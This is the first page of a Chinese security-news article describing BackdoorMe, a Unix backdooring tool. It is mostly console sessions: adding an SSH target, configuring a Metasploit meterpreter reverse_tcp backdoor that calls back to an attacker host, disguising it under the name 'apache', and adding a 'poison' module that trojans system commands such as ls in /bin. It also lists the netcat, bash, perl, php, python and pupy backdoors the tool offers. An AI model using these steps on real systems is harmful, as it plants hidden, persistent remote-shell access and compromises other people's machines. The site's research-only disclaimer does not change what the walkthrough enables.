欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

BackdoorMe:功能强大的自动化后门

来源:本站整理 作者:佚名 时间:2016-01-19 TAG: 我要投稿


Backdoorme是一个拥有强大能力的Unix后门,其使用了强扩展性的metasploit接口。在未来,这种依赖性随着这款的工具的扩展会逐渐降低。这里,我们给出配置SSH的说明。
使用方法
Backdoorme有着一系列内置的Backdoors(后门)、Modules(模块)和Auxiliaries(辅助模块)。Backdoors是用来创建和部署特定后门的组件,比如一个nc或者msfvenom后门。Modules可以用来应用到任何后门里,让它们变得更加隐匿,效果更加地好。而Auxiliaries,则能有效地提高您后门的持久性。
当然,在安装backdoorme之前,请先确保您准备好了所有的依赖包。
$ python dependencies.py
启动backdoorme:
$ python master.py     ___           __      __              __  ___    / _ )___ _____/ /_____/ /__  ___  ____/  |/  /__   / _  / _ `/ __/  '_/ _  / _ \/ _ \/ __/ /|_/ / -_)  /____/\_,_/\__/_/\_\\_,_/\___/\___/_/ /_/  /_/\__/  Welcome to BackdoorMe, a powerful backdooring utility. Type "help" to see the list of available commands.  Type "addtarget" to set a target, and "open" to open an SSH connection to that target.  Using local IP of 10.1.0.1.  >>
加入target:
>> addtarget  Target Hostname: 10.1.0.2  Username: victim  Password: password123   + Target 1 Set!  >>
Backdoor
请输入“use”关键词来使用后门:
>> use metasploit  + Using current target 1.   + Using Metasploit backdoor...  (msf) >>
从从这儿开始,你可以设置后门相关选项,运行“show options”或者“help”,来查看需要配置的参数。这里设置选项,用“set”就行了。
(msf) >> show options  Backdoor options:    Option      Value       Description     Required  ------      -----       -----------     --------  name        initd       name of the backdoor        False  format      elf     format to write the backdoor to     True  lhost       10.1.0.1        local IP to connect back to     True  encoder     none        encoder to use for the backdoor     False  lport       4444        local port to connect back on       True  payload     linux/x86/meterpreter/reverse_tcp       payload to deploy in backdoor       True  (msf) >> set name apache   + name => apache  (msf) >> show options  Backdoor options:    Option      Value       Description     Required  ------      -----       -----------     --------  name        apache      name of the backdoor        False  ...
现在Backdoorme里包含的后门包括:
Bash
Bash2 (依赖更多)
Metasploit
Netcat
Netcat-traditional
Perl
Php (非WEB后门,但使用了WEB模块)
Pupy
Python
Web (php –WEB后门)
Modules
每个后门在添加了额外的模块后,会变得更加有效。要添加一个模块,只需要使用“add”。
(msf) >> add poison   + Poison module added
每个模块都有额外的参数可以定制,如果运行了“help”,你可以看到或者设置任何附加选项。
(msf) >> help  ...  Poison module options:    Option      Value       Description     Required  ------      -----       -----------     --------  name        ls        name of command to poison     False  location /bin       where to put poisoned files into        False
现在能启用的模块包括:
Poison:
感染目标计算机上的可执行文件,它会编译一个exe,把原有的程序变为后门。

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载